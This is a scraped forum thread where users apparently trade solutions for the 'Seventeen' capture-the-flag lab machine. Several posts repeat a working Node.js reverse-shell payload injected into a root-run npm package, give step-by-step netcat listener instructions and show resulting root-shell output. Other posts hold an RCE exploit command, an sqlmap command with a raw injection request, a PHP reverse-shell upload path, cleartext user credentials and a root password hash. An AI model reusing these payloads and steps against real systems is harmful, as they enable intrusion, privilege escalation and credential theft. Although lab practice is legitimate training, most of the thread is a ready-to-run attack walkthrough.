Posts: 46 Threads: 0 Joined: N/A (May 29, 2022, 07:24 AM)z3r0Day Wrote: (May 29, 2022, 06:27 AM)dude4695 Wrote: for root
better create 2 ssh connection 1 for running startup.sh and 1 for edit file
ssh1: sudo /opt/app/startup.sh
ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js
and add this function on top in file
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("bash", []);
var client = new net.Socket();
client.connect(PORT, "IP", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
you will get this payload from here
https://www.revshells.com/
stop startup.sh app and run again you will get root shell
let me say! you're god , i can't solve it without your help , but please can you explain for me about this path /opt/app/node_modules/loglevel/lib/loglevel.js check startup.sh file there're 2 dependencies 1 is db-logger and other 1 is loglevel npm package installing both dependencies and that script ruuning as root i hope u understand Posts: 30 Threads: 0 Joined: N/A (May 29, 2022, 10:15 AM)dude4695 Wrote: (May 29, 2022, 07:24 AM)z3r0Day Wrote: (May 29, 2022, 06:27 AM)dude4695 Wrote: for root
better create 2 ssh connection 1 for running startup.sh and 1 for edit file
ssh1: sudo /opt/app/startup.sh
ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js
and add this function on top in file
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("bash", []);
var client = new net.Socket();
client.connect(PORT, "IP", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
you will get this payload from here
https://www.revshells.com/
stop startup.sh app and run again you will get root shell
let me say! you're god , i can't solve it without your help , but please can you explain for me about this path /opt/app/node_modules/loglevel/lib/loglevel.js
check startup.sh file there're 2 dependencies 1 is db-logger and other 1 is loglevel
npm package installing both dependencies and that script ruuning as root
i hope u understand i got you bro
(May 29, 2022, 01:36 AM)ryzen Wrote: (May 28, 2022, 09:24 PM)puni Wrote: https://raw.githubusercontent.com/twseptian/rce-authenticated-from-exploit-db/main/rce-auth.py
RCE
python3 rce-auth.py -t http://exam.seventeen.htb/ -u admin -p admin
proxychains mysql -u mysqluser -h 172.18.0.1 -p
pass mysqlpassword
How did you identify the RCE? this help me a lot https://www.exploit-db.com/exploits/50726 Posts: 17 Threads: 0 Joined: N/A I leave the root hash here, I think they can unlock writeup
root:$6$zKJAdLXN$2q2KQQs7CNXr6p.GJAuzESBeX97RB2cdQID4hUUv12CIZvEhCATo8JqsvzVghUlHGVfHXgAuWIVE.GtdVVZPw.:19092:0:99999:7::: Posts: 40 Threads: 0 Joined: N/A (May 29, 2022, 05:55 AM)dude4695 Wrote: http://seventeen.htb:8000/oldmanagement/
student no.: 31234
password: autodestruction
and upload php rev shell file
http://seventeen.htb:8000/oldmanagement/files/31234/shell.php
u will get the user Mark password here
/var/www/html/employeemanagementsystem/process/dbh.php
for user kavi password
/opt/app/node_modules/db-logger/logger.js
Here is both user creds
mark:2020bestyearofmylife
kavi:IhateMathematics123# Oh well this is stupid. I tried to upload a file endlessly but it just wouldn't work for me Posts: 17 Threads: 0 Joined: N/A Where is the user.txt file tho? Posts: 24 Threads: 0 Joined: N/A (May 29, 2022, 06:27 AM)dude4695 Wrote: for root
better create 2 ssh connection 1 for running startup.sh and 1 for edit file
ssh1: sudo /opt/app/startup.sh
ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js
and add this function on top in file
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("bash", []);
var client = new net.Socket();
client.connect(PORT, "IP", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
you will get this payload from here
https://www.revshells.com/
stop startup.sh app and run again you will get root shell I dont make to run. a file desapiers. no reverse shell , de code to inject banish. Any tip o idea. please Posts: 73 Threads: 0 Joined: N/A (May 29, 2022, 04:19 PM)Hoze Wrote: Where is the user.txt file tho? Is it a joke 😎 Just need to logon via ssh using Mark credentials then you can retrieve in his home directory: mark@seventeen:~$ ls -al
total 36
drwxr-x--- 5 mark mark 4096 May 11 11:54 .
drwxr-xr-x 4 root root 4096 Apr 8 19:06 ..
lrwxrwxrwx 1 mark mark 9 Apr 10 03:17 .bash_history -> /dev/null
-rw-r--r-- 1 mark mark 220 Apr 8 19:06 .bash_logout
-rw-r--r-- 1 mark mark 3771 Apr 8 19:06 .bashrc
drwx------ 2 mark mark 4096 Apr 8 19:26 .cache
drwx------ 3 mark mark 4096 Apr 8 19:26 .gnupg
drwxrwxr-x 16 mark mark 4096 May 11 16:52 .npm
-rw-r--r-- 1 mark mark 807 Apr 8 19:06 .profile
-rw-r----- 1 mark mark 33 May 29 15:15 user.txt
mark@seventeen:~$ cat user.txt
Posts: 73 Threads: 0 Joined: N/A (May 30, 2022, 01:54 AM)Peter Wrote: (May 29, 2022, 06:27 AM)dude4695 Wrote: for root
better create 2 ssh connection 1 for running startup.sh and 1 for edit file
ssh1: sudo /opt/app/startup.sh
ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js
and add this function on top in file
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("bash", []);
var client = new net.Socket();
client.connect(PORT, "IP", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
you will get this payload from here
https://www.revshells.com/
stop startup.sh app and run again you will get root shell
I dont make to run. a file desapiers. no reverse shell , de code to inject banish. Any tip o idea. please You need to do this a little bit faster, else loglevel directory will be removed. Copy this function in memory (Ctrl+c) and replace with your IP and PORT: (function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("bash", []);
var client = new net.Socket();
client.connect(4000, "10.10.1X.XX", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
1. On Terminal 1, open SSH with kavi user 2. On Terminal 2, open a second SSH with kavi user then prepare your command (but don't launch because file not yet exist): vim /opt/app/node_modules/loglevel/lib/loglevel.js 3. On Terminal 3: nc -lvnp 4000 4. On Terminal1: sudo /opt/app/startup.sh 5. On Terminal 2: launch your previous command and paste on the TOP your function in step 2 then write and exit (with :x it's more faster) 6. On Terminal1: quit and re-run sudo /opt/app/startup.sh 7. On Terminal3: we can see you reverse shell has been triggered: ─$ nc -lvnp 4000
listening on [any] 4000 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.11.165] 50614
uid=0(root) gid=0(root) groups=0(root)
You need to switch quickly between your 2 sessions SSH for step 4, 5 and 6, that's all. All explanation from @ Dude4695 are enough. Posts: 15 Threads: 0 Joined: N/A (May 28, 2022, 08:18 PM)Exa Wrote: There is an SQL injection vulnerability on http://seventeen.htb/vendor/oldmanagement/ (the stud_no parameter).
Using sqlmap, I found a valid login. Could you show your sqlmap request because I have tired with sqlmap fails My command is 'sqlmap -r sqlmap.txt -p stud_no --level=5 --risk=3' where sqlmap.txt - POST request to server Posts: 213 Threads: 0 Joined: N/A (May 30, 2022, 05:05 PM)hacktheboxer Wrote: (May 28, 2022, 08:18 PM)Exa Wrote: There is an SQL injection vulnerability on http://seventeen.htb/vendor/oldmanagement/ (the stud_no parameter).
Using sqlmap, I found a valid login.
Could you show your sqlmap request because I have tired with sqlmap fails
My command is 'sqlmap -r sqlmap.txt -p stud_no --level=5 --risk=3' where sqlmap.txt - POST request to server sqlmap -r r.txt -p stud_no --level 2 --batch r.txt contains: POST /vendor/oldmanagement/ HTTP/1.1
Host: seventeen.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://seventeen.htb
Connection: close
Referer: http://seventeen.htb/vendor/oldmanagement/
Cookie: PHPSESSID=1gnir2juq0ktu3bhh3j3egvf03
Upgrade-Insecure-Requests: 1
stud_no=11111&password=secret&login=
|
